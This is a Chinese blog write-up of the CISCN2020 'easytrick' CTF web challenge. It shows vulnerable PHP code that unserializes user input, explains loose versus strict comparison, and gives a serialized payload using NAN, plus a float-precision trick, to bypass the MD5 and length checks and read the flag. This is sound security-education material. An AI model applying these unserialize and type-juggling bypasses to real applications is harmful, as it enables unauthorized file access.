CISCN2020初赛_Web

最新推荐文章于 2021-12-03 11:36:52 发布
VIP文章 最新推荐文章于 2021-12-03 11:36:52 发布
阅读量1k 收藏 4
点赞数 2
分类专栏: CTF_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43431158/article/details/108158174
版权

easytrick

 <?php
class trick{
   
    public $trick1;
    public $trick2;
    public function __destruct(){
   
        $this->trick1 = (string)$this->trick1;
        if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){
   
            die("你太长了");
        }
        if($this->trick1 !== $this->trick2 && md5($this->trick1) === md5($this->trick2) && $this->trick1 != $this->trick2){
   
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
unserialize($_GET['trick']);

观察代码,发现trick1 这个参数被强制转成了string类型,这里之所以强制转换,主要是下面的md5($this->trick1) === md5($this->trick2),虽然是===,但md5函数在处理数组时有缺陷默认数组为0,所以这里才要强制转换下类型。

这道题是根据强网杯的一道题改的

if($_POST['param1']!==$_POST['param2'] &&md5($_POST['param1'])===md5($_POST['param2']))
{
   
	die("success!");
}

这道题就多了一个检测长度的和$this->trick1 != $this->trick2,所以就要思考怎么绕过去。

首先要说的一点便是!==!=这两点的区别

<?php
$a=1;
$b='1';
$c=1;
var_dump($a!==$b);
#bool(true) 
var_dump($a!=$b);
#bool(false) 
==!= 比较如果类型不同,先偿试转换类型,再作值比较,最后返回值比较结果
===!== 只有在相同类型下,才会比较其值

当时做题思考的是因为此时不能输入数组了,只能输入字符串,就需要进行md5碰撞

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2

在这里插入图片描述
都有相同的hash值,但在这道题中是不行的,因为长度限制了,没做出来也是卡在这里了。看了Y1ng师傅的WP,才知道利用NAN或INF即可

INF这个值在PHP中代表的是无穷大的意思
NaN常在浮点数运算中使用

payload:

<?php
class trick{
   
    public $trick1;
    public $trick2;
}

$tr = new trick();
$tr->trick1 = NAN;
$tr->trick2 = NAN;
echo serialize($tr);

得到的序列化传进去即可得到flag,这里可能在$this->trick1 != $this->trick2这段代码处有所疑惑,不都是NaN,而且上面不是还是说==先转换类型再比较值,既然这样为什么还是执行成功了,原因在于

NAN代表非数值的特殊值,用于指示某个值不是数字
NAN与其他数值进行比较的结果总是不相等的,包括自身在内

在这里插入图片描述

所以比较结果为true

与自身不等的浮点数类型

除此之外,看了Drom师傅的博客学到了另外一种方法:

因为这道题是考察浮点数精度问题导致的大小比较以及函数处理问题,当小数小于10^-16后,PHP对于小数就大小不分了

var_dump(1.000000000000000 == 1) >> TRUE
var_dump(1.0000000000000001 == 1) >> TRUE

在这里插入图片描述
0.999999999999999917个9)经过strlen函数会判断为1
在这里插入图片描述
经过测试发现!==!=均成立
在这里插入图片描述
最后看一下md5函数处理后是否相同
在这里插入图片描述
确实也成立,那就写payload即可

<?php
class trick{
   
    public $trick1
最低0.47元/天 解锁文章
lemonl1
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Cisco_思科_ppt_visio设备图库
12-06
Cisco_思科_ppt_visio设备图库,画拓扑图很有用的
2020ciscn wp
qq_52342676的博客
05-30 710
第十五届全国大学生信息安全竞赛创新实践能力赛
PHP函数漏洞总结
柠檬木有枝
08-26 2366
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
2021暨南大学CTF新生杯(Web篇)
恒Keep毅
12-03 4547
目录【1星????】baby_sql【3星????】checkin相关链接弱语言判断科学技术法绕过字符串绕过【1星????】baby-upload【2星????】baby-unserialize绕过wake_up十六进制绕过【2星????】easy-sql构建tamper手动注入【2星????】easy_js处理十六进制的JS源码阅读JS源码控制台修改【2星????】easy-upload伪造后缀名字上传一句话以及菜刀拿到flag【4星????】easy-rce仅能函数执行?我该怎么绕过读取文件呢?【3星?
[CISCN2020]-easyphp
Keepb1ue的博客
08-21 6547
源码: <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); if(!pcntl_wifexited($status)){ phpinfo(); } }else{
CISCN 2020初赛 writeup web部分
LOST frequency的博客
08-25 1797
CISCN2020初赛 writeup web部分 目录CISCN2020初赛 writeup web部分web1:easyphp思路payloadweb2:babyunserialize考点思路payload:web3:rceme题目源码考点思路payloadweb4:littlegame题目源码:考点思路payloadweb5:easytrick题目源码考点思路payload web1:easyphp <?php //题目环境:php:7.4.8-apache $pid = pcn
ciscn2020复现-web-Easytrick
qq_44657899的博客
08-24 749
文章目录0x01 INF绕过0x02 php精度绕过 源码如下: <?php class trick{ public $trick1; public $trick2; public function __destruct(){ $this->trick1 = (string)$this->trick1; if(strlen($this->trick1) > 5 || strlen($this->trick2) &g
英文 思科宣传册_CISCO.txt
08-24
思科宣传册2020链接 CCNA CISCO通用手册 CCNA CISCO手册2020 CCNA CISCO手册2020
Cisco_IOS_.rar_Cisco_IOS_
09-14
详细说明Cisco_IOS基本命令集.chm
Cisco_Marketing_Icons_marketing_cisco_Visio图标_思科_
10-04
思科VISIO拓扑图标免费下载,网络工程师必备!
mib.zip_mib_mib snmp cisco_mib 思科_oid_思科MIB文件
09-21
思科全量mib库,snmp v1、v2 oid 查找
0x7f php过滤,2020全国大学生信息安全竞赛Online Web题解 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com...
weixin_42363854的博客
04-07 493
0x00 前言周末参加了一下国赛,有两年没参与了,还是一如既往的“吓人”。0x01 babyunserialize题目存在源码泄露:http://eci-2ze0loaxjkuesryhroqr.cloudeci1.ichunqiu.com/www.zip打开后发现是fatfree框架,进行代码审计,发现目标网站使用了php框架fatfree,且为最新版。同时关注到index.php路由:$f3-...
PHP的pcntl进程控制教程一(pcntl_fork)
weixin_34100227的博客
06-11 435
pcntl 简介 PHP的进程控制支持实现了Unix方式的进程创建, 程序执行, 信号处理以及进程的中断。 进程控制不能被应用在Web服务器环境,当其被用于Web服务环境时可能会带来意外的结果。 这份文档用于阐述每个进程控制函数的通常用法。关于Unix进程控制的更多信息建议您查阅 系统文档中关于fork(2),waitpid(2),sig...
php pcntl_fork
weixin_34205076的博客
02-10 151
&lt;?php /** * Created by PhpStorm. * User: lost * Date: 14-2-10 * Time: 上午10:51 * fork 中必须以cli 命令行方式运行 以web 形式运行的化 只能运行父进程 * 例如 * /usr/local/php/bin/php /Users/lost/www-nginx/libev...
第十三届全国大学生信息安全竞赛 2020CISCN 线上初赛Writeup
末初的CSDN博客
09-06 5097
第十三届全国大学生信息安全竞赛
第十三届全国大学生信息安全竞赛(线上初赛
A_dmin的博客
08-21 9769
第十三届全国大学生信息安全竞赛(线上初赛WEB easyphp 打开题目拿到源码: 让进程异常退出,进入到phpinfo中 payload: http://eci-2ze4mvter6u3r4shc9j6.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait 运行得到phpinfo,找到flag即可: RCEME 貌似有原题,不过过滤的不一样,这道题没有过滤反撇号: <?php error_reporting(0); h
PHP绕过MD5比较的各种姿势
b1ackc4t的博客
08-27 2255
1.用==进行弱类型比较时, 可以通过两个0e开头后面纯数字的md5绕过 php在进行弱类型比较时,如果为字符串为纯数字,包括浮点数、科学计数法、十六进制数等,都会转化为数字类型再进行比较,利用这点,0e开头的科学计数法大小均为0,所有均相等,即可绕过 以下实例的md5均满足0e开头纯数字 byGcY sonZ7y 240610708 s878926199a s155964671a s214587387a s214587387a s878926199a QNKCDZO aabg7XS
buuctf web小结
qq_42551635的博客
04-25 4493
你传你*呢 .htaccess文件 AddType application/x-httpd-php xxx 本句话的作用是使该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件 一个傻逼错误 var/www/html 是网站根目录,也就等价于 http://55f19d33-bd47-48ac-9734-232c1632f237.node3.buuoj.cn 所以蚁剑里链接时不能重复输入 题解 上传.htaccess文件(注意绕过MIME) 然后上传图片马 ,o
VUE中关于this.$nextTrick()的记录
凉茶冰
10-24 3537
目录 问题描述 实现思路 我的理解 问题描述 项目中有这样一个需求,页面中有一个textArea输入框,当输入相关字符,例如:下划线_,#、{的时候,会自动有一个弹框,弹框中是输入框,让输入相关内容,按下回车键,相关内容会进行转换追加到textArea中。要求是默认进入页面textArea自动获取焦点,弹框的时候,弹框中的输入框自动获取焦点。 实现思路 使用elementUI的...
思科胖ap web配置页面
最新发布
11-27
思科胖AP是思科公司推出的一种无线接入点设备,可以通过web配置页面进行设置和管理。 要访问思科胖AP的web配置页面,首先需要将AP连接到电脑或者局域网中的路由器。连接后,打开浏览器,输入AP的默认IP地址,例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值